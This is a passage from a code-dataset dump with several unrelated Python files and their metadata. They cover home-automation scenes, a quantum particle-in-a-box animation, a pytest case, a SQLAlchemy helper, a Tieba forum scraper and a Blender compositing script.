{"api_name": "tensorflow.nn", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tensorflow.gradients", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.stop_gradient", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.stop_gradient", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.nn.l2_normalize", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 136, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.l2_normalize", "line_number": 137, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 137, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.train.AdagradOptimizer", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 141, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdagradOptimizer", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 142, "usage_type": "attribute"}, {"api_name": "utils.tools.csr_to_pairwise", "line_number": 159, "usage_type": "call"}, {"api_name": "utils.DataIterator", "line_number": 160, "usage_type": "call"}, {"api_name": 
"utils.tools.csr_to_pairwise", "line_number": 174, "usage_type": "call"}, {"api_name": "utils.DataIterator", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 197, "usage_type": "call"}]} +{"seq_id": "574228335", "text": "from threading import Thread, Event, RLock\nfrom datetime import datetime\nfrom time import sleep\nfrom homedaemon.bus import Bus\nfrom homedaemon.logger import Logger\nfrom homedaemon.devices import Devices\nfrom typing import Dict, Any, List, Set, Callable\nfrom pyiot.software import Time\n\n\n\nclass SceneInterface:\n def __init__(self, sid:str):\n self.sid = sid\n self.bus = Bus()\n self.devices = Devices()\n self.logger = Logger()\n self.name = ''\n self.model = ''\n self.place = ''\n self.running: Set[Callable[[], None]] = set()\n self.lock = RLock()\n \n def _runner(self, handler: Callable[[], None], *args:Any) -> None:\n with self.lock:\n self.logger.debug(f'Scene {self.name} running list {self.running} {handler}')\n if handler in self.running:\n self.logger.warning(f'Scene {self.name}: {handler.__name__} allready started')\n return\n else:\n self.running.add(handler)\n self.bus.emit(f'report.{self.sid}.status.on', f'Scene {self.name}: {handler.__name__} start')\n \n try:\n handler()\n except Exception as err:\n self.logger.error(f'scene running error {self.name} {err}')\n finally: \n self.bus.emit(f'report.{self.sid}.status.off', f'Scene {self.name}: {handler.__name__} end')\n self.running.remove(handler)\n \n def sleep(self, s:int):\n sleep(s)\n\n def get_device(self, sid:str):\n return self.devices.get(sid)\n\n def store_device_state(self, *sids:str):\n pass\n \n def restore_devices_state(self, *sids:str):\n pass\n \n def device_status(self) -> Dict[str,Any]:\n ret = {'status': 'off',\n 'sid': self.sid,\n 'name': self.name,\n 'place': self.place}\n if self.running:\n events :List[str] = [x.__name__ for x in self.running]\n ret['status'] = 'on'\n ret['events'] = events\n return ret\n \n def now(self):\n \"\"\"Retrun time now\"\"\"\n return datetime.now().time()\n \n\nclass BaseScene(SceneInterface):\n def __init__(self, sid:str):\n super().__init__(sid)\n self.reversible = False\n self.model = 'scene'\n self.bus.add_trigger(f'write.{self.sid}.status.on', self._on, self.on)\n self.bus.add_trigger(f'write.{self.sid}.status.off',self._off, self.off)\n \n def _on(self):\n if self.on in self.running:\n self.logger.warning(f'Scene {self.name} allready started')\n else:\n self.running.add(self.on)\n self.bus.emit(f'report{self.sid}.status.on', f'Scene {self.name}: on')\n try:\n self.on()\n # sc = Thread(name=self.name, target=self.on)\n # sc.start()\n except Exception as err:\n self.logger.error(f'scene running error {self.name} {err}')\n finally:\n if not self.reversible:\n self.bus.emit(f'report{self.sid}.status.off', f'Scene {self.name}: off')\n \n def on(self):\n pass\n \n def _off(self):\n if not self.reversible or not self.on in self.running:\n return\n try:\n self.off()\n # sc = Thread(name=self.name, target=self.off)\n # sc.start()\n except Exception as err:\n self.logger.error(f'scene running error {self.name} {err}')\n finally:\n self.bus.emit(f'report{self.sid}.status.off', f'Scene {self.name}: off')\n # self.running = False\n \n def off(self):\n pass\n\n \nclass BaseAutomation(SceneInterface):\n def __init__(self, sid:str):\n super().__init__(sid) \n self.model = 'automation'\n \n def add_trigger(self, trigger:str, handler:Callable[[], None]) -> None:\n self.bus.add_trigger(trigger, self._runner, handler)\n\n\nclass 
RunAfter:\n def __init__(self, delay:int, callback: Callable[[], None], *args: Any):\n self.delay = delay\n self.callback = callback\n self.args = args\n self.ev = Event()\n self._is_waiting = False\n \n def wait(self):\n Thread(target=self._wait, daemon=True).start()\n \n def _wait(self):\n self.ev.clear()\n self._is_waiting = True\n if not self.ev.wait(timeout=self.delay):\n if self.args:\n self.callback(*self.args)\n else:\n self.callback()\n else:\n print('canceled')\n \n @property\n def is_waiting(self):\n return self._is_waiting\n \n def cancel(self):\n self.ev.set()\n self._is_waiting = False\n \nclass TimeRange:\n \"\"\"TimeRange\"\"\"\n def __init__(self, _from: Time, _to: Time):\n self._from = _from\n self._to = _to\n \n def __contains__(self, value: Time):\n if value > self._to:\n return self._from <= value >= self._to\n elif value < self._to:\n return self._from >= value <= self._to\n", "sub_path": "homedaemon/scenes.py", "file_name": "scenes.py", "file_ext": "py", "file_size_in_byte": 5136, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "homedaemon.bus.Bus", "line_number": 15, "usage_type": "call"}, {"api_name": "homedaemon.devices.Devices", "line_number": 16, "usage_type": "call"}, {"api_name": "homedaemon.logger.Logger", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 21, "usage_type": "name"}, {"api_name": "threading.RLock", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 24, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 43, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 119, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 124, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 128, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 132, "usage_type": "call"}, {"api_name": "pyiot.software.Time", "line_number": 155, "usage_type": "name"}, {"api_name": "pyiot.software.Time", "line_number": 159, "usage_type": "name"}]} +{"seq_id": "218938436", "text": "import logging\n\nfrom .core.manager import Manager\nfrom .ui.qt5.mainwindow import MainWindow\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(name)s %(threadName)-s %(levelname)s: %(message)s',\n datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n\nclass Main:\n def __init__(self):\n self.ui = MainWindow(Manager())\n\n\nif __name__ == \"__main__\":\n Main()\n", "sub_path": "sample/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 394, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.basicConfig", "line_number": 6, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "ui.qt5.mainwindow.MainWindow", "line_number": 13, "usage_type": "call"}, 
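Note on the homedaemon/scenes.py record above (seq_id 574228335): TimeRange.__contains__ uses chained comparisons such as self._from <= value >= self._to, which does not test membership and returns None when value == self._to; the docstring typo "Retrun", the repeated "allready", and the BaseScene emits of f'report{self.sid}...' (missing the '.' separator used elsewhere as f'report.{self.sid}...') also look like slips. A corrected membership sketch, substituting datetime.time for pyiot.software.Time (whose API is not shown here) and adding support for ranges that wrap past midnight:

    from datetime import time

    class TimeRange:
        """Inclusive time range; also handles ranges that cross midnight."""
        def __init__(self, _from: time, _to: time):
            self._from = _from
            self._to = _to

        def __contains__(self, value: time) -> bool:
            if self._from <= self._to:
                # Ordinary range, e.g. 08:00-17:00.
                return self._from <= value <= self._to
            # Wrapping range, e.g. 22:00-06:00.
            return value >= self._from or value <= self._to

    assert time(23, 0) in TimeRange(time(22, 0), time(6, 0))
    assert time(12, 0) in TimeRange(time(8, 0), time(17, 0))
    assert time(7, 0) not in TimeRange(time(22, 0), time(6, 0))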
{"api_name": "core.manager.Manager", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "431916486", "text": "import numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib import animation\r\n\r\n\r\n\r\n# First set up the figure, the axis, and the plot element we want to animate\r\nfig = plt.figure()\r\nax = plt.axes(xlim=(0, 500), ylim=(-0.3, 0.3))\r\nline, = ax.plot([], [], lw=2)\r\n\r\n\r\n\r\ndef PIB_Func(x, n, L):\r\n return np.sqrt(2/L)*np.sin(n*np.pi*x/L)\r\n\r\ndef Gauss_Packet(sig,x, x0, k0):\r\n ci = 0 + 1j\r\n pre = 1/(sig*np.sqrt(2*np.pi))\r\n gx = np.exp(-0.5*((x-x0)/sig)**2)\r\n pw = np.exp(ci*k0*x)\r\n return pre*gx*pw\r\n\r\ndef FourierAnalysis(x, PsiX, n, L):\r\n cn = np.zeros(len(n),dtype=complex)\r\n dx = x[1]-x[0]\r\n for i in range (0,len(cn)):\r\n \r\n som = 0+0j\r\n psi_i = PIB_Func(x, n[i], L)\r\n\r\n for j in range (0, len(x)):\r\n som = som + psi_i[j]*PsiX[j]*dx\r\n\r\n cn[i] = som\r\n\r\n return cn\r\n\r\ndef PIB_En(n, L):\r\n En = (n*n * np.pi*np.pi)/(2*L*L)\r\n return En\r\n\r\ndef PIB_Time(n, L, t):\r\n E = PIB_En(n, L)\r\n ci = 0.+1j\r\n phi_n_t = np.exp(-1*ci*E*t)\r\n ### Write code here to define phi_n_t\r\n return phi_n_t\r\n\r\nL = 500.\r\nsig = 20.\r\nk0 = 0.5\r\nx0 = 200.\r\nN = 500\r\nx = np.linspace(0,L,5000)\r\nn = np.linspace(1, 100,100)\r\ny=PIB_Func(x,6,L)+PIB_Func(x,3,L)\r\nP = np.real(np.conj(y)*y)\r\ncn = FourierAnalysis(x, y, n, L)\r\n\r\npsi_exp = np.zeros(len(x))\r\nfor i in range (0,len(cn)):\r\n psi_exp = psi_exp + cn[i]*PIB_Func(x, i+1, L)\r\n\r\ndef init():\r\n line.set_data([], [])\r\n return line,\r\n\r\n# animation function. This is called sequentially to generate the animation\r\ndef animate(i):\r\n \r\n ### Once PIB_Func and PIB_En are defined, the following\r\n ### code can be used to plot the time-evolution of an energy eigenfunction\r\n\r\n ### Define x-grid - this will be for a particle in a box of length L=30 atomic units (Bohr radii)\r\n ### We will represent the function with 1000 grid points (dx = 30/1000)\r\n \r\n \r\n\r\n ### Imaginary unit i\r\n \r\n psi_t = np.zeros(len(x),dtype=complex)\r\n print(cn[2],cn[5]) \r\n print(PIB_Time(3,L,i),PIB_Time(6,L,i))\r\n for j in range(0,len(cn)):\r\n psi = PIB_Func(x, n[j], L,)\r\n ft = PIB_Time(n[j], L, i)\r\n psi_t = psi_t +cn[j]*psi*ft\r\n \r\n \r\n psi_t_star = np.conj(psi_t)\r\n\r\n y = np.real(psi_t)\r\n z = np.imag(psi_t)\r\n p = np.real(psi_t_star*psi_t)\r\n line.set_data(x, y)\r\n return line,\r\n\r\n\r\nanim = animation.FuncAnimation(fig, animate, init_func=init,\r\n frames=10000, interval=200, blit=True)\r\n### uncomment to save animation as mp4 \r\n#anim.save('pib_wp.mp4', fps=20, extra_args=['-vcodec', 'libx264'])\r\nplt.show()\r\n\r\n\r\n#lt.plot(x,np.real(psi_exp),'r--', x, np.real(y), 'blue')\r\n#lt.show()\r\n", "sub_path": "oldfiles/Code.4.23.2018.py", "file_name": "Code.4.23.2018.py", "file_ext": "py", "file_size_in_byte": 2714, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 15, "usage_type": 
"attribute"}, {"api_name": "numpy.sqrt", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.conj", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.conj", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.imag", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}]} +{"seq_id": "146846071", "text": "import pytest\nfrom leetcode import sort_colours\n\n\n@pytest.mark.parametrize(\n 'nums,expected',\n [\n ([0, 1, 2, 1, 2], [0, 1, 1, 2, 2]),\n ([1, 2, 1], [1, 1, 2]),\n ([1], [1]),\n ],\n)\ndef test_sort_colours(nums, expected):\n assert sort_colours.sort_colours(nums) == expected\n", "sub_path": "tests/test_sort_colours.py", "file_name": "test_sort_colours.py", "file_ext": "py", "file_size_in_byte": 302, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "leetcode.sort_colours.sort_colours", "line_number": 14, "usage_type": "call"}, {"api_name": "leetcode.sort_colours", "line_number": 14, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 5, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "399347620", "text": "\"\"\"API Database Resources\"\"\"\n\n\nimport logging\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nfrom api.config import Config\nfrom api.logger import time_function\n\nengine = create_engine(Config.DB['URI'], pool_size=10, max_overflow=20)\nSession = sessionmaker(bind=engine)\nbase = declarative_base(bind=engine)\n\nstoreSession = Session()\nlastSession = Session()\nallSession = Session()\n\n@time_function\ndef to_database(obj):\n \"\"\"Store the object into the database\n \n Arguments:\n obj {Declarative_Base} -- SqlAlchemy Base ORM object to be stored\n \n Returns:\n Declarative_base -- ORM Object stored in database\n \"\"\"\n try:\n storeSession.add(obj)\n storeSession.commit()\n logging.debug('Stored to database')\n return obj\n except Exception as _x:\n storeSession.rollback()\n logging.exception('Database storage session error: %s', (_x))\n storeSession.close()\n \n", "sub_path": "api/database.py", "file_name": "database.py", "file_ext": "py", "file_size_in_byte": 
1041, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 13, "usage_type": "call"}, {"api_name": "api.config.Config.DB", "line_number": 13, "usage_type": "attribute"}, {"api_name": "api.config.Config", "line_number": 13, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 38, "usage_type": "call"}, {"api_name": "api.logger.time_function", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "229571911", "text": "from urllib.parse import urlencode\r\nfrom html.parser import HTMLParser\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom HtmlFactory import HtmlFactory\r\nimport urllib.request\r\nimport urllib.parse\r\nimport http.cookiejar, threading\r\nimport random, sys, datetime, time, os\r\nimport time\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nclass CatchHtml():\r\n def __init__(self, obj):\r\n self.GUI = obj\r\n self.lastPage = 0\r\n self.htmlFactory = HtmlFactory()\r\n self.non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd)\r\n self.numOfCatch = 0\r\n self.numthd = 0\r\n self.thdList = []\r\n self.tLock = threading.Lock()\r\n date = datetime.datetime.now()\r\n filename = '%s_%s_%s.log' % (date.year, date.month, date.day)\r\n if os.path.exists(filename):\r\n os.remove(filename)\r\n self.logFile = open('%s_%s_%s.log' % (date.year, date.month, date.day),\"a+\",encoding='UTF-8')\r\n \r\n def catchContent(self, url):\r\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\r\n date = datetime.datetime.now()\r\n txtFile=open('%s_%s_%s_%s.csv' % (date.year, date.month, date.day, self.keyword),\"a+\",encoding='UTF-8')\r\n if self.numOfCatch == 0:\r\n print( '\\uFEFF', file=txtFile, end='' )\r\n print( 'Date,Title,Author,Content,Comments', file=txtFile )\r\n print( '開始save to csv' )\r\n\r\n request = urllib.request.Request(url ,headers=headers)\r\n print('sss1')\r\n html = urllib.request.urlopen(request)\r\n print('sss2')\r\n txtHtml = html.read().decode('utf8', errors='ignore').translate(self.non_bmp_map)\r\n html.close()\r\n print('sss3')\r\n Date = self.htmlFactory.getDate(txtHtml) \r\n if Date == '':\r\n html.close()\r\n return False\r\n result = self.htmlFactory.getDate(txtHtml) + ',' + self.htmlFactory.getTitle(txtHtml) + ',' + self.htmlFactory.getAuthor(txtHtml) + ',' + self.htmlFactory.getContent(txtHtml) + ',' + self.htmlFactory.getComment(txtHtml)\r\n print( 'result = content' )\r\n \r\n print( 'output result' )\r\n print( result, file=txtFile )\r\n #print( '------------------------------------------------------------------------------', file=txtFile )\r\n \r\n #html.close()\r\n\r\n \r\n self.tLock.acquire()\r\n self.numOfCatch = self.numOfCatch + 1\r\n self.tLock.release()\r\n return True\r\n def catchAllContents(self, urls):\r\n \r\n for url in urls:\r\n print(url)\r\n self.catchContent(url)\r\n #time.sleep (5)\r\n #thd = threading.Thread(target = self.catchContent, name='Catch%s' % self.numthd, args=(url,))\r\n #self.thdList.append( thd )\r\n #thd.start()\r\n #self.numthd = self.numthd + 1\r\n \r\n def catch(self, keyword, index, times = 0):\r\n try:\r\n strI = index/10 if index > 
0 else 1\r\n self.GUI.showStatus.setText('正在抓取第%d頁' % strI)\r\n print('正在抓取第%d頁' % strI )\r\n headers = { \r\n #'Connection': 'Keep-Alive', \r\n #'Accept-Language': 'zh-TW,zh;en-US;q=0.6,en;q=0.4', \r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n #'Host' : 'tieba.baidu.com',\r\n #'Content-Type': 'text/html; charset=GBK',\r\n #'Upgrade-Insecure-Requests': '1',\r\n \r\n }\r\n \r\n\r\n url = 'https://www.google.com.tw/search?start=' + str(index) + '&q=' + urllib.parse.quote(keyword.encode('utf8')) + '+site%3Ahttps%3A%2F%2Ftieba.baidu.com%2F'\r\n ############# find last page\r\n \r\n\r\n #######################\r\n print('begin open' )\r\n print( url )\r\n\r\n request = urllib.request.Request(url, headers=headers)\r\n response = urllib.request.urlopen(request)\r\n print('end open' ) \r\n content = response.read().decode('GBK', errors='ignore').translate(self.non_bmp_map)\r\n response.close()\r\n #print(content)\r\n #print( '---->getUrls' )\r\n urls = self.htmlFactory.getUrls(content)\r\n #print( urls[0] )\r\n print( '---->end getUrls num: %d' % len(urls) )\r\n \r\n \r\n \r\n #print(content, file=open('111.html',\"a+\",encoding='GBK'))\r\n # 抓取內容\r\n #print( '---->catchContent' )\r\n if len(urls) <= 0 or times > 5:\r\n return False\r\n self.catchAllContents(urls)\r\n #print( '---->end catchContent' )\r\n except Exception as e:\r\n print('catch 發生Error: ' + str(e))\r\n print('catch 發生Error', file=self.logFile)\r\n self.GUI.textEdit.append('catch發生Error')\r\n print('重新開始至抓取' + str(index))\r\n self.catch(keyword, index, times=times+1)\r\n return True\r\n print('輸出成功至')\r\n return True\r\n def forCatching(self, keyword, beginI, endI ):\r\n stopIndex = endI\r\n sum_index = 1;\r\n i = self.lastPage = beginI\r\n while i <= endI:\r\n if not self.catch(keyword, i):\r\n stopIndex = i\r\n break;\r\n sum_index = sum_index + 1;\r\n if self.lastPage == -1:\r\n break \r\n print('Catch success')\r\n i = i + 10\r\n # Wait for all threads to terminate. 
\r\n for t in self.thdList:\r\n t.join()\r\n #print( 'after sleep %d' % len(self.thdList) )\r\n \r\n self.GUI.showStatus.setText('結束 第%d頁, 共抓%d筆資料' % (stopIndex, self.numOfCatch))\r\n self.numOfCatch = 0\r\n self.numthd = 0\r\n self.GUI.GoButton.setEnabled(True)\r\n self.logFile.close()\r\n def start(self, keyword, beginI, endI):\r\n self.keyword = keyword\r\n thd = threading.Thread(target = self.forCatching, name='Catching', args=(keyword,beginI-1,endI*10))\r\n thd.start()\r\n #self.catch(keyword, beginI)\r\n", "sub_path": "BIDOo/CatchHtml.py", "file_name": "CatchHtml.py", "file_ext": "py", "file_size_in_byte": 6332, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "HtmlFactory.HtmlFactory", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.maxunicode", "line_number": 18, "usage_type": "attribute"}, {"api_name": "threading.Lock", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "urllib.parse.request.Request", "line_number": 38, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 38, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 38, "usage_type": "name"}, {"api_name": "html.parser", "line_number": 40, "usage_type": "name"}, {"api_name": "urllib.parse.request.urlopen", "line_number": 40, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 40, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 40, "usage_type": "name"}, {"api_name": "html.parser.read", "line_number": 42, "usage_type": "call"}, {"api_name": "html.parser", "line_number": 42, "usage_type": "name"}, {"api_name": "html.parser.close", "line_number": 43, "usage_type": "call"}, {"api_name": "html.parser", "line_number": 43, "usage_type": "name"}, {"api_name": "html.parser.close", "line_number": 47, "usage_type": "call"}, {"api_name": "html.parser", "line_number": 47, "usage_type": "name"}, {"api_name": "urllib.parse.parse.quote", "line_number": 90, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 90, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 90, "usage_type": "name"}, {"api_name": "urllib.parse.request.Request", "line_number": 98, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 98, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 98, "usage_type": "name"}, {"api_name": "urllib.parse.request.urlopen", "line_number": 99, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 99, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 99, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 152, "usage_type": "call"}]} +{"seq_id": "601552592", "text": "#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n'''BlendNet Script Compose\n\nDescription: Special script used by the Manager to compose result\n'''\n\nimport signal # The other better ways are not working for 
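Note on the BIDOo/CatchHtml.py record above (seq_id 229571911): its progress strings are Chinese — '正在抓取第%d頁' ("fetching page %d"), '開始save to csv' ("start saving to csv"), '結束 第%d頁, 共抓%d筆資料' ("finished at page %d, %d records fetched"). Its catch() method also retries failed fetches by calling itself recursively, deepening the stack on every failure. An iterative sketch with bounded retries and exponential backoff (fetch_html is a hypothetical helper; standard library only):

    import time
    import urllib.request

    HEADERS = {'User-Agent': 'Mozilla/5.0'}

    def fetch_html(url, retries=5, backoff=2.0):
        """Fetch a URL, retrying with exponential backoff on any error."""
        for attempt in range(retries):
            try:
                req = urllib.request.Request(url, headers=HEADERS)
                with urllib.request.urlopen(req, timeout=30) as resp:
                    return resp.read().decode('utf-8', errors='ignore')
            except Exception:
                if attempt == retries - 1:
                    raise
                time.sleep(backoff ** attempt)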
subprocess...\nsignal.signal(signal.SIGTERM, lambda s, f: print('WARN: Dodged TERM subprocess'))\n\nimport os, sys, json\nsys.path.append(os.path.dirname(__file__))\n\nimport disable_buffering\nimport blend_file\n\n# Read current task specification from json file\ntask = None\nwith open(sys.argv[-1], 'r') as f:\n task = json.load(f)\n\nexitcode = 0\n\nimport bpy\n\nprint(\"INFO: Preparing composing of:\", bpy.data.filepath)\n\nscene = bpy.context.scene\n\n# Set frame if provided\nif 'frame' in task:\n scene.frame_current = task['frame']\n\nprint('INFO: Checking existance of the dependencies')\ngoods, bads = blend_file.getDependencies(task.get('project_path'), task.get('cwd_path'), True)\nprint('DEBUG: Goods:', goods)\nprint('DEBUG: Bads:', bads)\n\nif scene.render.is_movie_format:\n print('WARN: Unable to save still image to movie format, so use single-layer exr for compose')\n exitcode = 1\n scene.render.image_settings.file_format = 'OPEN_EXR'\n scene.render.image_settings.color_mode = 'RGBA'\n scene.render.image_settings.color_depth = '32'\n scene.render.image_settings.exr_codec = 'ZIP'\n\n# Set the output file\nfilename = bpy.path.basename(scene.render.frame_path())\nscene.render.filepath = os.path.abspath(os.path.join(task.get('result_dir'), filename))\nos.makedirs(bpy.path.abspath(task.get('result_dir')), mode=0o750, exist_ok=True)\n\nimage_path = os.path.abspath(bpy.path.abspath(task.get('render_file_path')))\nprint('DEBUG: Using render image:', image_path)\nbpy.ops.image.open(filepath=image_path, use_sequence_detection=False)\nimage = bpy.data.images[bpy.path.basename(task.get('render_file_path'))]\n\n# If compositing is disabled - just convert the file to the required format\nif not task.get('use_compositing_nodes'):\n print('DEBUG: Compositing is disabled, just converting the render image')\n if scene.render.image_settings.file_format == 'OPEN_EXR_MULTILAYER':\n print('WARN: Just move the render to compose due to blender bug T71087')\n # Windows will not just replace the file - so need to check if it's exist\n try:\n if os.path.exists(bpy.path.abspath(scene.render.frame_path())):\n os.remove(bpy.path.abspath(scene.render.frame_path()))\n os.rename(image_path, bpy.path.abspath(scene.render.frame_path()))\n except Exception as e:\n # Could happen on Windows if file is used by some process\n print('ERROR: Unable to move file:', str(e))\n sys.exit(1)\n\n # Save the loaded image as render to convert\n image.save_render(bpy.path.abspath(scene.render.frame_path()))\n\n# Enable compose to replace the regular render layers node with prerendered EXR image\nscene.render.use_compositing = True\nscene.render.use_sequencer = False\nscene.use_nodes = True\n\nimage_node = scene.node_tree.nodes.new(type='CompositorNodeImage')\nimage_node.image = image\n\nlink_name_overrides = {}\nif image_node.image.type == 'MULTILAYER':\n try:\n image_node.layer = 'View Layer'\n except:\n # In Blender v3 the naming was changed\n image_node.layer = 'ViewLayer'\n link_name_overrides['Image'] = 'Combined'\n\nnodes_to_remove = []\nlinks_to_create = []\n# Find nodes, links and outpus\nfor node in scene.node_tree.nodes:\n print('DEBUG: Checking node %s' % (node,))\n if not isinstance(node, bpy.types.CompositorNodeRLayers) or node.scene != scene:\n continue\n nodes_to_remove.append(node)\n print('INFO: Reconnecting %s links to render image' % (node,))\n for link in scene.node_tree.links:\n print('DEBUG: Checking link %s - %s' % (link.from_node, link.to_node))\n if link.from_node != node:\n continue\n print('DEBUG: Found 
